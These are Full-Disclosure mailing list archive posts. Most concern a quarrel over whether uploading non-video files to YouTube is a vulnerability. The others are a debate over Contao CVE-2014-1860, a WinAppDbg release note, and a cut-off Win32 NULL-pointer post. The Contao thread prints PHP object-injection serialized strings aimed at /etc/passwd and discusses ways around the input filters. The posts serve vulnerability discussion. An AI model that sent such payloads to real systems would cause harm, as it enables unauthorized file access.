However successful exploitation permits arbitrary write() of any file of choice. I could release an exploit code in C Sharp or Python that permits multiple file uploads of any file/types, if the Google security team feels that this would be necessary. This is unpaid work, so we are not so keen on that job. On Fri, Mar 14, 2014 at 6:04 AM, Jerome Athias athiasjer...@gmail.com wrote: Hi I concur that we are mainly discussing a terminology problem. In the context of a Penetration Test or WAPT, this is a Finding. Reporting this finding makes sense in this context. As a professional, you would have to explain if/how this finding is a Weakness*, a Violation (/Regulations, Compliance, Policies or Requirements[1]) * I would say Weakness + Exposure = Vulnerability. Vulnerability + Exploitability (PoC) = Confirmed Vulnerability that needs Business Impact and Risk Analysis So I would probably have reported this Finding as a Weakness (and not Vulnerability. See: OWASP, WASC-TC, CWE), explaining that it is not Best Practice (your OWASP link and Cheat Sheets), and even if mitigative/compensative security controls (Ref Orange Book), security controls like white listing (or at least black listing. see also ESAPI) should be 1) part of the [1]security requirements of a proper SDLC (Build security in) as per Defense-in-Depth security principles and 2) used and implemented correctly. NB: A simple Threat Model (i.e. list of CAPEC) would be a solid support to your report This would help to evaluate/measure the risk (e.g. CVSS). Helping the decision/actions around this risk PS: interestingly, in this case, I'm not sure that the Separation of Duties security principle was applied correctly by Google in term of Risk Acceptance (which could be another Finding) So in few words, be careful with the terminology. (don't always say vulnerability like the media say hacker, see RFC1392) Use a CWE ID (e.g. CWE-434, CWE-183, CWE-184 vs. CWE-616) My 2 bitcents Sorry if it is not edible :) Happy Hacking! /JA https://github.com/athiasjerome/XORCISM 2014-03-14 7:19 GMT+03:00 Michal Zalewski lcam...@coredump.cx: Nicholas, I remember my early years in the infosec community - and sadly, so do some of the more seasoned readers of this list :-) Back then, I thought that the only thing that mattered is the ability to find bugs. But after some 18 years in the industry, I now know that there's an even more important and elusive skill. That skill boils down to having a robust mental model of what constitutes a security flaw - and being able to explain your thinking to others in a precise and internally consistent manner that convinces others to act. We need this because the security of a system can't be usefully described using abstract terms: even the academic definitions ultimately boil down to saying the system is secure if it doesn't do the things we *really* don't want it to do. In this spirit, the term vulnerability is generally reserved for behaviors that meet all of the following criteria: 1) The behavior must have negative consequences for at least one of the legitimate
Re: [Full-disclosure] Google vulnerabilities with PoC
Try learning how to properly send emails before critizicing anyone, pal. ;) On Fri, Mar 14, 2014 at 6:44 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: People can read the report if they like. Can't you even do basic things like reading a vulnerability report? Can't you see that the advisory is about writing arbitrary files. If I was your boss I would fire you. -- Forwarded message -- From: Nicholas Lemonias. lem.niko...@googlemail.com Date: Fri, Mar 14, 2014 at 5:43 PM Subject: Re: [Full-disclosure] Google vulnerabilities with PoC To: Mario Vilas mvi...@gmail.com People can read the report if they like. Can't you even do basic things like reading a vulnerability report? Can't you see that the advisory is about writing arbitrary files. If I was your boss I would fire you, with a good kick outta the door. On Fri, Mar 14, 2014 at 3:55 PM, Mario Vilas mvi...@gmail.com wrote: On Fri, Mar 14, 2014 at 12:38 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Jerome of Mcafee has made a very valid point on revisiting separation of duties in this security instance. Happy to see more professionals with some skills. Some others have also mentioned the feasibility for Denial of Service attacks. Remote code execution by Social Engineering is also a prominent scenario. Actually, people have been pointing out exactly the opposite. But if you insist on believing you can DoS an EC2 by uploading files, good luck to you then... If you can't tell that that is a vulnerability (probably coming from a bunch of CEH's), I feel sorry for those consultants. You're the only one throwing around certifications here. I can no longer tell if you're being serious or this is a massive prank. Nicholas. On Fri, Mar 14, 2014 at 10:45 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: We are on a different level perhaps. We do certainly disagree on those points. I wouldn't hire you as a consultant, if you can't tell if that is a valid vulnerability.. Best Regards, Nicholas Lemonias. On Fri, Mar 14, 2014 at 10:10 AM, Mario Vilas mvi...@gmail.com wrote: But do you have all the required EH certifications? Try this one from the Institute for Certified Application Security Specialists: http://www.asscert.com/ On Fri, Mar 14, 2014 at 7:41 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Thanks Michal, We are just trying to improve Google's security and contribute to the research community after all. If you are still on EFNet give me a shout some time. We have done so and consulted to hundreds of clients including Microsoft, Nokia, Adobe and some of the world's biggest corporations. We are also strict supporters of the ACM code of conduct. Regards, Nicholas Lemonias. AISec On Fri, Mar 14, 2014 at 6:29 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Hi Jerome, Thank you for agreeing on access control, and separation of duties. However successful exploitation permits arbitrary write() of any file of choice. I could release an exploit code in C Sharp or Python that permits multiple file uploads of any file/types, if the Google security team feels that this would be necessary. This is unpaid work, so we are not so keen on that job. On Fri, Mar 14, 2014 at 6:04 AM, Jerome Athias athiasjer...@gmail.com wrote: Hi I concur that we are mainly discussing a terminology problem. In the context of a Penetration Test or WAPT, this is a Finding. Reporting this finding makes sense in this context. As a professional, you would have to explain if/how this finding is a Weakness*, a Violation (/Regulations, Compliance, Policies or Requirements[1]) * I would say Weakness + Exposure = Vulnerability. Vulnerability + Exploitability (PoC) = Confirmed Vulnerability that needs Business Impact and Risk Analysis So I would probably have reported this Finding as a Weakness (and not Vulnerability. See: OWASP, WASC-TC, CWE), explaining that it is not Best Practice (your OWASP link and Cheat Sheets), and even if mitigative/compensative security controls (Ref Orange Book), security controls like white listing (or at least black listing. see also ESAPI) should be 1) part of the [1]security requirements of a proper SDLC (Build security in) as per Defense-in-Depth security principles and 2) used and implemented correctly. NB: A simple Threat Model (i.e. list of CAPEC) would be a solid support to your report This would help to evaluate/measure the risk (e.g. CVSS). Helping the decision/actions around this risk PS: interestingly, in this case, I'm not sure that the Separation of Duties security principle was applied correctly by Google in term of Risk Acceptance (which could be another Finding) So in few words, be careful with the terminology. (don't always say vulnerability like the media say hacker, see RFC1392) Use a CWE ID (e.g. CWE-434, CWE-183, CWE-184 vs. CWE-616
Re: [Full-disclosure] Fwd: Fwd: Google vulnerabilities with PoC
Not to mention imaginary. On Fri, Mar 14, 2014 at 6:58 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Says the script kiddie... Beg for some publicity. My customers are FTSE 100. -- Forwarded message -- From: Nicholas Lemonias. lem.niko...@googlemail.com Date: Fri, Mar 14, 2014 at 5:58 PM Subject: Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC To: antisnatchor antisnatc...@gmail.com Says the script kiddie... Beg for some publicity. My customers are FTSE 100. On Fri, Mar 14, 2014 at 5:55 PM, antisnatchor antisnatc...@gmail.comwrote: LOL you're hopeless. Good luck with your business. Brave customers! Cheers antisnatchor Nicholas Lemonias. wrote: People can read the report if they like. Can't you even do basic things like reading a vulnerability report? Can't you see that the advisory is about writing arbitrary files. If I was your boss I would fire you. -- Forwarded message -- From: Nicholas Lemonias. lem.niko...@googlemail.com Date: Fri, Mar 14, 2014 at 5:43 PM Subject: Re: [Full-disclosure] Google vulnerabilities with PoC To: Mario Vilas mvi...@gmail.com People can read the report if they like. Can't you even do basic things like reading a vulnerability report? Can't you see that the advisory is about writing arbitrary files. If I was your boss I would fire you, with a good kick outta the door. On Fri, Mar 14, 2014 at 3:55 PM, Mario Vilas mvi...@gmail.com wrote: On Fri, Mar 14, 2014 at 12:38 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Jerome of Mcafee has made a very valid point on revisiting separation of duties in this security instance. Happy to see more professionals with some skills. Some others have also mentioned the feasibility for Denial of Service attacks. Remote code execution by Social Engineering is also a prominent scenario. Actually, people have been pointing out exactly the opposite. But if you insist on believing you can DoS an EC2 by uploading files, good luck to you then... If you can't tell that that is a vulnerability (probably coming from a bunch of CEH's), I feel sorry for those consultants. You're the only one throwing around certifications here. I can no longer tell if you're being serious or this is a massive prank. Nicholas. On Fri, Mar 14, 2014 at 10:45 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: We are on a different level perhaps. We do certainly disagree on those points. I wouldn't hire you as a consultant, if you can't tell if that is a valid vulnerability.. Best Regards, Nicholas Lemonias. On Fri, Mar 14, 2014 at 10:10 AM, Mario Vilas mvi...@gmail.comwrote: But do you have all the required EH certifications? Try this one from the Institute for Certified Application Security Specialists: http://www.asscert.com/ On Fri, Mar 14, 2014 at 7:41 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Thanks Michal, We are just trying to improve Google's security and contribute to the research community after all. If you are still on EFNet give me a shout some time. We have done so and consulted to hundreds of clients including Microsoft, Nokia, Adobe and some of the world's biggest corporations. We are also strict supporters of the ACM code of conduct. Regards, Nicholas Lemonias. AISec On Fri, Mar 14, 2014 at 6:29 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Hi Jerome, Thank you for agreeing on access control, and separation of duties. However successful exploitation permits arbitrary write() of any file of choice. I could release an exploit code in C Sharp or Python that permits multiple file uploads of any file/types, if the Google security team feels that this would be necessary. This is unpaid work, so we are not so keen on that job. On Fri, Mar 14, 2014 at 6:04 AM, Jerome Athias athiasjer...@gmail.com wrote: Hi I concur that we are mainly discussing a terminology problem. In the context of a Penetration Test or WAPT, this is a Finding. Reporting this finding makes sense in this context. As a professional, you would have to explain if/how this finding is a Weakness*, a Violation (/Regulations, Compliance, Policies or Requirements[1]) * I would say Weakness + Exposure = Vulnerability. Vulnerability + Exploitability (PoC) = Confirmed Vulnerability that needs Business Impact and Risk Analysis So I would probably have reported this Finding as a Weakness (and not Vulnerability. See: OWASP, WASC-TC, CWE), explaining that it is not Best Practice (your OWASP link and Cheat Sheets), and even if mitigative/compensative security controls (Ref Orange Book), security controls like white listing (or at least black listing. see also ESAPI) should be 1) part of the [1]security requirements of a proper SDLC (Build security in) as per Defense-in-Depth security principles and 2) used and implemented correctly. NB
Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
[image: Inline image 1] On Fri, Mar 14, 2014 at 7:07 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Quite funnily, most erratic comments originate from a @gmail.com host. Does that mean that Google and Co are attacking the researcher ? On Fri, Mar 14, 2014 at 6:06 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Quite funnily, most erratic comments originate from a @gmail.com host. Does that mean that Google and Co are attacking the researcher ? On Fri, Mar 14, 2014 at 6:04 PM, Mike Hale eyeronic.des...@gmail.comwrote: No, you're saying something's a vulnerability without showing any indication of how it can be abused. On Fri, Mar 14, 2014 at 11:00 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: The full-disclosure mailing list has really changed. It's full of lamers nowdays aiming high. On Fri, Mar 14, 2014 at 5:58 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Says the script kiddie... Beg for some publicity. My customers are FTSE 100. -- Forwarded message -- From: Nicholas Lemonias. lem.niko...@googlemail.com Date: Fri, Mar 14, 2014 at 5:58 PM Subject: Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC To: antisnatchor antisnatc...@gmail.com Says the script kiddie... Beg for some publicity. My customers are FTSE 100. On Fri, Mar 14, 2014 at 5:55 PM, antisnatchor antisnatc...@gmail.com wrote: LOL you're hopeless. Good luck with your business. Brave customers! Cheers antisnatchor Nicholas Lemonias. wrote: People can read the report if they like. Can't you even do basic things like reading a vulnerability report? Can't you see that the advisory is about writing arbitrary files. If I was your boss I would fire you. -- Forwarded message -- From: Nicholas Lemonias. lem.niko...@googlemail.com Date: Fri, Mar 14, 2014 at 5:43 PM Subject: Re: [Full-disclosure] Google vulnerabilities with PoC To: Mario Vilas mvi...@gmail.com People can read the report if they like. Can't you even do basic things like reading a vulnerability report? Can't you see that the advisory is about writing arbitrary files. If I was your boss I would fire you, with a good kick outta the door. On Fri, Mar 14, 2014 at 3:55 PM, Mario Vilas mvi...@gmail.com wrote: On Fri, Mar 14, 2014 at 12:38 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Jerome of Mcafee has made a very valid point on revisiting separation of duties in this security instance. Happy to see more professionals with some skills. Some others have also mentioned the feasibility for Denial of Service attacks. Remote code execution by Social Engineering is also a prominent scenario. Actually, people have been pointing out exactly the opposite. But if you insist on believing you can DoS an EC2 by uploading files, good luck to you then... If you can't tell that that is a vulnerability (probably coming from a bunch of CEH's), I feel sorry for those consultants. You're the only one throwing around certifications here. I can no longer tell if you're being serious or this is a massive prank. Nicholas. On Fri, Mar 14, 2014 at 10:45 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: We are on a different level perhaps. We do certainly disagree on those points. I wouldn't hire you as a consultant, if you can't tell if that is a valid vulnerability.. Best Regards, Nicholas Lemonias. On Fri, Mar 14, 2014 at 10:10 AM, Mario Vilas mvi...@gmail.com wrote: But do you have all the required EH certifications? Try this one from the Institute for Certified Application Security Specialists: http://www.asscert.com/ On Fri, Mar 14, 2014 at 7:41 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Thanks Michal, We are just trying to improve Google's security and contribute to the research community after all. If you are still on EFNet give me a shout some time. We have done so and consulted to hundreds of clients including Microsoft, Nokia, Adobe and some of the world's biggest corporations. We are also strict supporters of the ACM code of conduct. Regards, Nicholas Lemonias. AISec On Fri, Mar 14, 2014 at 6:29 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Hi Jerome, Thank you for agreeing on access control, and separation of duties. However successful exploitation permits arbitrary write() of any file of choice. I could release an exploit code in C Sharp or Python that permits multiple file uploads of any file/types, if the Google security team feels that this would be necessary. This is unpaid work, so we are not so keen on that job. On Fri, Mar 14, 2014 at 6:04 AM, Jerome Athias athiasjer...@gmail.com wrote: Hi I concur that we are mainly
Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
So if you can upload a file to Google Drive and trick someone to run it, you'd call that a vulnerability too? Hey, I've got another one. I can upload a video on Youtube telling people to download and install a virus. I'll claim a prize too! Keep at it man, you're hilarious! xDDD /me goes grab more popcorn On Fri, Mar 14, 2014 at 8:28 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Then that also means that firewalls and IPS systems are worthless. Why spend so much time protecting the network layers if a user can send any file of choice to a remote network through http... As for the uploaded files being persistent, there is evidence of that. For instance a remote admin could be tricked to execute some of the uploaded files (Social Engineering). So our report sent as part of Google's security program, should not be treated as a non-security issue. Thanks, On Fri, Mar 14, 2014 at 7:23 PM, R D rd.secli...@gmail.com wrote: I'm going to try to spell it out clearly. You don't have unrestricted file upload[1]. Keep in mind you're trying to abuse youtube, which is essentially a video file upload service. So the fact that you can upload files is not surprising. Now you're uploading non-video files. Cool. But not earth-shattering. They are not accessible to anyone but you, as far as I can tell, and I don't even think you can access the file contents on the remote server, but please prove me wrong on both points. You are still, as far as I can tell, bound by the per-file and per-account quota on disk occupation, so you don't have a DoS by resource exhaustion. You can't force server-side file path, so you don't have RFI or DoS by messing with the remote file system. You can't execute the files you uploaded, so you don't have arbitrary code execution. But you are right about what your PoC does. You bypassed a security control, you uploaded crap on youtube servers, and by that you exhausted their resources by a fraction of the quota they allow you when signing up. BTW, I don't think they keep invalid video files for an indefinite period of time in a user account, but I might be wrong. The burden of proof is still on your side as to whether or not the bug you found has any impact that was not already accepted by youtube allowing registered users to upload whatever crap they see fit as long as it is video. You failed to provide this proof, and please be sure the audience of fulldisclosure is not attacking the researcher but working with you to have a better understanding of the bug you found, even though you kinda acted like a fool in this thread. Please keep on searching and finding vulns, please keep on publishing them, and use this as a learning experience that not all bugs or control bypasses are security vulnerabilities. --Rob' [1] As per OWASP ( https://www.owasp.org/index.php/Unrestricted_File_Upload): There are really two classes of problems here. The first is with the file metadata, like the path and file name. These are generally provided by the transport, such as HTTP multi-part encoding. This data may trick the application into overwriting a critical file or storing the file in a bad location. You must validate the metadata extremely carefully before using it. Your POC doesn't demonstrate that. The other class of problem is with the file size or content. The range of problems here depends entirely on what the file is used for. See the examples below for some ideas about how files might be misused. To protect against this type of attack, you should analyze everything your application does with files and think carefully about what processing and interpreters are involved. Your POC kinda does that, but you didn't provide proof it's possible to execute what you uploaded, either using social engineering or any other method. Also, please don't say verified by a couple of recognised experts including OWASP unless you actually spoke with someone @owasp and she validated your findings. On Fri, Mar 14, 2014 at 7:40 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: We have many PoC's including video clips. We may upload for the security world to see. However, this is not the way to treat security vulnerabilities. Attacking the researcher and bringing you friends to do aswell, won't mitigate the problem. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the
Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
Please provide an attack scenario. Can you do that? On Fri, Mar 14, 2014 at 9:23 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Are you sure this json response, or this file, will be there in a month? Or in a year? Is the fact that this json response exists a threat to youtube? Can you quantify how of a threat? How much, in dollars, does it hurt their business? This file may be here if the admins don't delete it. Now they may do ;@) So where do you think that information is coming from? The metadata and tags, and headers are contained in a database. The files are stored persistently , since they can be quoted. So the API works both ways. The main thing here is that the files are there, otherwise there metadata information would be deleted from the db aswell. http://gdata.youtube.com/demo/index.html?utm_source= twitterfeedutm_medium=twitter Youtube DATA API is unique.. the commands can be send through that interface... So we do definitely know that that is coming from a database. On Fri, Mar 14, 2014 at 8:22 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: You are trying to execute an sh script through a video player. That's an exec() command. So its the wrong way about accessing the file. On Fri, Mar 14, 2014 at 8:20 PM, R D rd.secli...@gmail.com wrote: No it's not. As Chris and I are saying, you don't have proof your file is accessible to others, only that is was uploaded. Now, you see, when you upload a video to youtube, you get the adress where it will be viewable in the response. In your case : {sessionStatus:{state:FINALIZED,externalFieldTransfers:[{name:file,status:COMPLETED,bytesTransferred:113,bytesTotal:113,formPostInfo:{url: http://www.youtube.com/upload/rupio?authuser=0\u0026upload_id=AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1--uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aw\u0026file_id=000 ,cross_domain_url: http://upload.youtube.com/?authuser=0\u0026upload_id=AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1--uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aw\u0026origin=CiNodHRwOi8vd3d3LnlvdXR1YmUuY29tL3VwbG9hZC9ydXBpbxINdmlkZW8tdXBsb2Fkcw},content_type:text/x-sh}],additionalInfo:{uploader_service.GoogleRupioAdditionalInfo:{completionInfo:{status:SUCCESS,customerSpecificInfo:{status: ok, *video_id: KzKDtijwHFI* ,upload_id:AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1--uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aw}} And what do we get when we browse to https://youtube.com/watch?v=KzKDtijwHFI ? Nothing. Can you send me a link where I can access the file content of the arbitrary file you uploaded? Are you sure this json response, or this file, will be there in a month? Or in a year? Is the fact that this json response exists a threat to youtube? Can you quantify how of a threat? How much, in dollars, does it hurt their business? --Rob On Fri, Mar 14, 2014 at 9:08 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: My claim is now verified Cheers! On Fri, Mar 14, 2014 at 8:04 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: http://upload.youtube.com/?authuser=0upload_id= AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1-- uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aworigin= CiNodHRwOi8vd3d3LnlvdXR1YmUuY29tL3VwbG9hZC9ydXBpbxINdmlkZW8tdXBsb2Fkcw That information can be queried from the db, where the metadata are saved. The files are being saved persistently , as per the above example. On Fri, Mar 14, 2014 at 8:04 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: http://upload.youtube.com/?authuser=0upload_id=AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1--uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aworigin=CiNodHRwOi8vd3d3LnlvdXR1YmUuY29tL3VwbG9hZC9ydXBpbxINdmlkZW8tdXBsb2Fkcw That information can be queried from the db, where the metadata are saved. The files are being saved persistently , as per the above example. On Fri, Mar 14, 2014 at 8:00 PM, Chris Thompson christhom7...@gmail.com wrote: Hi Nikolas, Please do read (and understand) my entire email before responding - I understand your frustration trying to get your message across but maybe this will help. Please put aside professional pride for the time being - I know how it feels to be passionate about something yet have others simply not understand. Let me try and bring some sanity to the discussion and explain to you why people maybe not agreeing with you. You (rightly so) highlighted what you believe to be an issue in a Youtube whereby it appears (to you) than you can upload an arbitrary file. If you can indeed do this as you suspect then your points are valid and you may be able to cause various issues associated with it such as DOS etc - especially if the uploaded files cannot or are not tracked. However... Consider than you are talking to an API and what you are getting back (the JSON response) in your example is simply a response from the API
Re: [Full-disclosure] [CVE-2014-1860] PHP object insertion / possible RCE in Contao CMS = 3.2.4
I haven't read the whole thread, so I apologize in advance for commenting on it. But I think it's important to mention that not a vulnerability and not exploitable are entirely different concepts. Since conclusively proving that a vulnerability is 100% not exploitable for all code paths in all possible environments is difficult at best (if not downright impossible), you can still consider something a vulnerability even if you don't have a proof of concept - you can assign it lower risk, of course, but it doesn't disappear, because there's at least a theoretical possibility that it may be exploited. So, let's not get into a flame war yet. :) On Fri, Feb 7, 2014 at 12:15 AM, Egidio Romano resea...@karmainsecurity.com wrote: Hello again, today a little bird known as i0n1c twitted something about me [1], claiming that I was wrong, and that CVE-2014-1860 could actually be exploited, because there is S: which allows encoded NUL bytes [2], and that's true in part. So, instead of using a string like this: O:9:ZipWriter:1:{s:10:\0*\0strTemp;s:11:/etc/passwd;} An attacker might be able to bypass the filter implemented within the Input::xssClean() method because she can also use a string like this: O:9:ZipWriter:1:{S:10:\00*\00strTemp;s:11:/etc/passwd;} The Input::xssClean() method removes not only NULL bytes, but also the string \0, meaning that the above string will be converted to: O:9:ZipWriter:1:{S:10:0*0strTemp;s:11:/etc/passwd;} Of course this could easily be bypassed using a string like this: O:9:ZipWriter:1:{S:10:\\000*\\000strTemp;s:11:/etc/passwd;} However, in such case there's another filter which doesn't allow to inject *protected* or *private* objects' properties, and that is implemented within the Input::encodeSpecialChars() method [3], which converts backslashes into #92;, meaning that the above string will be converted to: O:9:ZipWriter:1:{S:10:#92;00*#92;00strTemp;s:11:/etc/passwd;} Therefore, unless somebody (like Pedro Ribeiro or Mr. Stefan Esser) provides a working Proof of Concept, I will continue to believe that CVE-2014-1860 should be rejected as non-vulnerability. References: [1] https://twitter.com/i0n1c/status/431367715941400576 [2] https://twitter.com/i0n1c/status/431368722624704512 [3] http://git.io/DFkxDQ Kind Regards, Egidio Romano On Wed, Feb 05, 2014 at 11:13:29PM +0100, Egidio Romano wrote: Hello, I believe this CVE should be rejected, because the vulnerabilities actually don't exist, at least the ones mentioned in this report. The reason is that user input is passed to the unserialize() function through the Contao Input class, in which the Input::xssClean() method removes all the NULL bytes from user input, meaning that an attacker can be able to manipulate only the *public* properties of the injected objects, because *protected* and *private* properties of a serialized object are encoded with NULL bytes. I haven't found any exploitable magic method in Contao which uses only *public* properties, and the ones mentioned in the original report are exploitable only through *protected* properties. Therefore, unless someone provides a working Proof of Concept, I think these shouldn't be considered actual security vulnerabilities. Best Ragards, Egidio Romano Hi, I have discovered a vulnerability that might lead to code execution in Contao CMS = 3.2.4 Contao CMS = 3.2.4 does not properly validate user input in several locations which is then passed directly into PHP's unserialize. This has been fixed in Contao 3.2.5 as per commit: https://github.com/contao/core/commit/8c9cb044bdc887a8202bb65a64545c025664f957 and https://github.com/contao/core/commit/1717336598fdcf1ed3f4ad488e140147cb31516d Announcements can be found at https://contao.org/en/news/contao-3_2_5.html https://contao.org/en/news/contao-2_11_14.html Thanks to the Contao developers for being so responsive. The full report can be found at my repo in https://github.com/pedrib/PoC/blob/master/contao-3.2.4.txt Regards, Pedro Ribeiro Agile Information Security ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WinAppDbg 1.5 is out!
What is WinAppDbg? == The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment. It uses ctypes to wrap many Win32 API calls related to debugging, and provides an object-oriented abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows. The intended audience are QA engineers and software security auditors wishing to test / fuzz Windows applications with quickly coded Python scripts. Several ready to use utilities are shipped and can be used for this purposes. Current features also include disassembling x86/x64 native code, debugging multiple processes simultaneously and produce a detailed log of application crashes, useful for fuzzing and automated testing. What's new in this version? === In a nutshell... * full 64-bit support (including function hooks!) * added support for Windows Vista and above. * database code migrated to SQLAlchemy, tested on: + MySQL + SQLite 3 + Microsoft SQL Server should work on other servers too (let me know if it doesn't!) * added integration with more disassemblers: + BeaEngine: http://www.beaengine.org/ + Capstone: http://capstone-engine.org/ + Libdisassemble: http://www.immunitysec.com/resources-freesoftware.shtml + PyDasm: https://code.google.com/p/libdasm/ * added support for postmortem (just-in-time) debugging * added support for deferred breakpoints * now fully supports manipulating and debugging system services * the interactive command-line debugger is now launchable from your scripts (thanks Zen One for the idea!) * more UAC-friendly, only requests the privileges it needs before any action * added functions to work with UAC and different privilege levels, so it's now possible to run debugees with lower privileges than the debugger * added memory search and registry search support * added string extraction functionality * added functions to work with DEP settings * added a new event handler, EventSift, that can greatly simplify coding a debugger script to run multiple targets at the same time * added new utility functions to work with colored console output * several improvements to the Crash Logger tool * integration with already open debugging sessions from other libraries is now possible * improvements to the Process and GUI instrumentation functionality * implemented more anti-antidebug tricks * more tools and code examples, and improvements to the existing ones * more Win32 API wrappers * lots of miscellaneous improvements, more documentation and bugfixes as usual! Where can I find WinAppDbg? === Project homepage: - http://winappdbg.sourceforge.net/ Download links: --- Windows installer (32 bits) http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5.win32.msi/download Windows installer (64 bits) http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5.win-amd64.msi/download Source code http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5.zip/download Documentation: -- Online http://winappdbg.sourceforge.net/doc/v1.5/tutorial http://winappdbg.sourceforge.net/doc/v1.5/reference Windows Help http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-tutorial.chm/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-reference.chm/download HTML format (offline) http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-tutorial.chm/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-reference.chm/download PDF format (suitable for printing) http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-tutorial.pdf/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-reference.pdf/download Acknowledgements Acknowledgements go to Arthur Gerkis, Chris Dietrich, Felipe Manzano, Francisco Falcon, @Ivanlef0u, Jean Sigwald, John Hernandez, Jun Koi, Michael Hale Ligh, Nahuel Riva, Peter Van Eeckhoutte, Randall Walls, Thierry Franzetti, Thomas Caplin, and many others I'm probably forgetting, who helped find and fix bugs in the almost eternal beta of WinAppDbg 1.5! ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Defense in depth -- the Microsoft way (part 13): surprising and inconsistent behaviour, sloppy coding, sloppy QA, sloppy documentation
This may be a silly question, so I apologize in advance, but that would exactly be the advantage here? Using a NULL pointer is in most (if not all) those cases undocumented behavior to begin with. Unless I'm missing something, the problem is not so much with Win32 as it is with the C language in general... On Sun, Nov 3, 2013 at 4:30 PM, Stefan Kanthak stefan.kant...@nexgo.dewrote: Hi @ll, the Win32 API is full of idiosyncrasies resp. surprising and inconsistent, poorly tested and documented behaviour. Just to pick one: NULL pointer as string argument. 0. lstrlen(NULL) lstrcat(NULL, ...) and lstrcat(..., NULL) lstrcmp(NULL, ...) and lstrcmp(..., NULL) lstrcmpi(NULL, ...) and lstrcmpi(..., NULL) lstrcpy(NULL, ...) and lstrcpy(..., NULL) lstrcpyn(NULL, ..., 0) and lstrcpy(..., NULL, ...) do not yield an exception, but treat their NULL arguments like an empty string (when used as source), resp. return NULL (when used as destination). 1. wsprintf(NULL, ...) and wvsprintf(NULL, ...) wsprintf(..., NULL, ...) and wvsprintf(..., NULL, ...) yield an access violation in USER32.DLL. 2. CommandLineToArgvW(NULL, ...) yields an access violation in SHELL32.DLL. 3. CreateProcess(NULL, NULL, ...) CreateProcessAsUser(..., NULL, NULL, ...) CreateProcessWithLogonW(..., ..., ..., ..., NULL, NULL, ...) CreateProcessWithTokenW(..., ..., NULL, NULL, ...) yield an access violation in KERNEL32.DLL. 4. GetFileAttributes(NULL) does not yield an exception, but treats the NULL argument like an empty string. 5. GetBinaryType(NULL, ...) does not yield an exception, but treats the NULL argument like an empty string. 6. MessageBox(..., NULL, ...) and MessageBox(..., ..., NULL, ...) do not yield an exception, but treat the NULL argument like an empty string. 7. FatalAppExit(0, 